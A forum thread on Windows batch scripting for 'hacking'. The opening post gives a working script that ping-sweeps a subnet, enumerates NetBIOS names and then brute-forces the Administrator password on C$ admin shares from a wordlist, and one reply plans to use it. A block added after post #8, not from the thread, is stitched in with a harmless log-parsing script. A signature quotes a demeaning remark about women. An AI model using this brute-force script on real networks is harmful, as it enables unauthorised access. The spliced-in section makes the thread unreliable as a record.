
Thread: Hacking with DOS?

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785

    Hacking with DOS?

    Many are quick to say Windows is lame. Well, it might not be as stable and might not come with all the third-party software *nix has, but an operating system is only as lame as its operator. Now I can think of a dozen boring examples but nobody would pay any attention, so I made up a simple scenario that might get some to really try to learn their OS.


    (lame though it may be, it's just to illustrate a point)

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    What, I don't have a scanner on the computer I'm on and can't download EXEs... no prob! This is an NT based box and I know my ****:

    sending.bat
    ------------------------------------------

    REM all the text for each "for" statement
    REM must be on one line

    for /L %%x IN (1,1,255) DO ping -n 1 10.0.0.%%x | find /I "reply" >>pg.txt

    for /F "tokens=1 delims=:" %%x in (pg.txt) DO echo %%x >>pg2.txt

    for /f "tokens=3" %%x IN (pg2.txt) DO nbtstat -A %%x |more >>pg3.txt

    -------------------------------------------
    You could enter it one line at a time at the command prompt without making a batch file, but that's not nearly as much fun.

    In the first "for" statement, (1,1,255) says: make %%x equal 1, incrementing by 1 each loop until it reaches 255. In a batch file '%' by itself will be removed, so it must be used twice: "%%"

    ping returns:

    Reply from 10.0.0.1: bytes=32 time=150ms TTL=59

    By changing the default delimiter to a colon, splitting the line into 2 tokens in pg2.txt and printing only the first, and removing the colon because it is the delimiter ("tokens=1 delims=:"), we are left with only:

    Reply from 10.0.0.1

    In the third "for" statement we used the default or "space" delimiter, making the IP addy the third token (tokens=3), and using nbtstat -A we record the results to pg3.txt.

    Now it's time to get yourself a drink and go to the bathroom before you get into the long haul:

    for /f "tokens=1" %%x in (wordlist.txt) do NET USE \\10.0.0.1\c$ /user: Administrator %%x

    This is all done without using some stupid poorly made program that may contain a trojan.

    You're on your own from here. I'm not trying to teach you to break into a computer, there's enough written in tutorials to show you that, but rather to show you what you can do if you know your OS. Just remember, if you try this on the net you could get screwed. There is nothing stealth about this.

    Have a happy new year and resolve to really learn what you have. Don't wait for that special book or tutorial to come along... just do it.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  2. #2
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785

    I guess this needs to be pointed out more clearly.

    This will not work on 9x machines.

    For those who do not know their basics, "for" is an internal command. That is to say it is contained in command.com and cmd.exe.

    The for command on 9x machines will not loop through the contents of files or increment variables. Only the for command of NT or better machines will do this.

  3. #3
    Senior Member
    Join Date
    Aug 2002
    Posts
    651
    You bring up a very good point here Ted. I mean, why not learn the OS if you are going to be working with it? As for the "hack", I personally don't have much experience with batch files or programming for that matter, but I do understand the implications. For the most part, I can look at files like this and figure out what they mean, so your post has proven quite helpful (That's the point, I know.) I have not had much choice in learning Windows, but I am trying to learn as much as I can of Linux. My efforts have proven invaluable since I have been assigned projects involving the OS at work.

    Next time make up your mind where you want to post it; you moved it on me earlier, and I had to retype it from memory! j/k Keep up the good work Ted.


    Cheers.
    Opinions are like holes - everybody's got 'em.

  4. #4
    Junior Member
    Join Date
    Jun 2003
    Posts
    26
    Hmmm, nice one, a NetBIOS batch file scanner.
    Gonna use this one for sure.

    But it scans only for the Administrator account, or am I wrong?

  5. #5
    Deceased x acidreign x's Avatar
    Join Date
    Jul 2002
    Posts
    455
    you said this would work on "NT or better" but I tried it on BSD and it didn't work :-(
    (joking)

    Good tutorial, I enjoyed reading it.
    :q :q! :wq :w :w! :wq! :quit :quit! :help help helpquit quit quithelp :quitplease :quitnow :leave :**** ^X^C ^C ^D ^Z ^Q QUITDAMMIT ^[:wq GCS,M);d@;p;c++;l++;u ++ ;e+ ;m++(---) ;s+/+ ;n- ;h* ;f+(--) ;!g ;w+(-) ;t- ;r+(-) ;y+(**)

  6. #6
    Senior Member
    Join Date
    Jun 2003
    Posts
    119
    Ok, someone needs to PM me, I'm confused.. srry
    [glowpurple]The inside secrets of big business are being leaked onto the Net - (who's fault is that ) - Me[/glowpurple] http://www.AntiOnline.com/sig.php?imageid=419

  7. #7
    Fantastic post... The only problem posed is that, like someone before me said, it only scans for the "admin". So one might be confronted with not only finding the pass but a valid user name as well.

    Scat
    If the scatman can do it so can you.

  8. #8
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    I just used that as an example of what you could do, as food for thought. You could use the same principle to scan for null connections or whatever, just put the commands with args after the DO, but as was stated earlier you could get busted.

    On the non-hacking side, I have a bunch of remote locations with WinVNC listening on DSL connections. Each location sends a file with its location code as its name to an FTP server. Using the FOR command I loop through the log twice. The first pass gets piped through 'find' and creates a file containing only lines with the matching location code. The second time I loop through making %%X equal the IP address. The next line starts VNC %%X, which is the last or latest address in the log file. Now all I have to do is enter the password.
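The two-pass log trick described in post #8, written out as an added example (not a script from the thread or its author), using the same "for /f" tokens/delims parsing that post #1 explains. The log format, file names and the LOC042 location code are constructed for the example; a real FTP server log will need its own "tokens=" value, and the viewer command at the end is only a comment.

```batch
@echo off
REM Added example: find the latest client IP logged for one location code
REM in an FTP transfer log, using FIND as a filter (pass 1) and a FOR /F
REM loop over the filtered file (pass 2), then split the address on dots.
REM Requires cmd.exe (NT or later); COMMAND.COM's FOR cannot read files.
setlocal

set "LOG=xferlog.txt"
set "CODE=%~1"
if "%CODE%"=="" set "CODE=LOC042"

REM Constructed sample log (date time client-ip file-name), written only
REM so the example runs stand-alone. Delete this block for a real log.
if not exist "%LOG%" (
  > "%LOG%" echo 2003-06-01 08:00:01 10.0.0.21 LOC042
  >>"%LOG%" echo 2003-06-01 08:05:10 10.0.0.35 LOC017
  >>"%LOG%" echo 2003-06-02 09:12:44 10.0.0.77 LOC042
)

REM Pass 1: keep only the lines that mention this location code.
type "%LOG%" | find "%CODE%" > "%CODE%.tmp"

REM Pass 2: with the default space delimiter the client IP is token 3.
REM Every iteration overwrites LASTIP, so when the loop ends it holds the
REM newest entry, exactly the "last or latest address" post #8 relies on.
set "LASTIP="
for /f "tokens=3" %%x in (%CODE%.tmp) do set "LASTIP=%%x"
del "%CODE%.tmp"

if not defined LASTIP (
  echo No entries for %CODE% in %LOG%
  exit /b 1
)

REM Same parsing on a string instead of a file: change the delimiter to a
REM dot (as post #1 changed it to a colon) and take the fourth token.
for /f "tokens=4 delims=." %%o in ("%LASTIP%") do set "LASTOCTET=%%o"

echo Latest address for %CODE%: %LASTIP% (host part %LASTOCTET%)
REM The original post launches the viewer at this point, e.g.
REM   start vncviewer %LASTIP%
endlocal
```

Run it as `latestip.bat LOC042` (or with no argument for the default code). The filter in pass 1 is a plain substring match, so a code that is a prefix of another (LOC04 versus LOC042) would match both lines; give the codes a fixed width or append a separator to the search string if that can happen in your log.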

  9. #9
    Junior Member
    Join Date
    Mar 2005
    Posts
    1
    very smart to point out that you must know your OS if you want to hack anything, even simple batch files with DOS.

  10. #10
    Senior Member
    Join Date
    Jan 2005
    Posts
    217

    WELCOME TO AO

    Hi dickfitzwell,

    WELCOME TO AO!

    I believe that hacking interests you, as it interests us here in AO, especially being aware of it and avoiding such things in the near future.

    You could visit the AO FAQ for more introduction about AO.

    To start, like any organization that you are willing to join, AO has rules, traditions, and a community willing to help and share their knowledge and opinions. The FAQ could be a short walk-through for you to get involved in the community.

    Enjoy your stay!

    Yo!
    "Life without FREEDOM is no life at all". - William Wallace
    MyhomE MyboX StealtH (loop n. see loop.)
    http://www.geocities.com/sebeneleben/SOTBMulti.gif
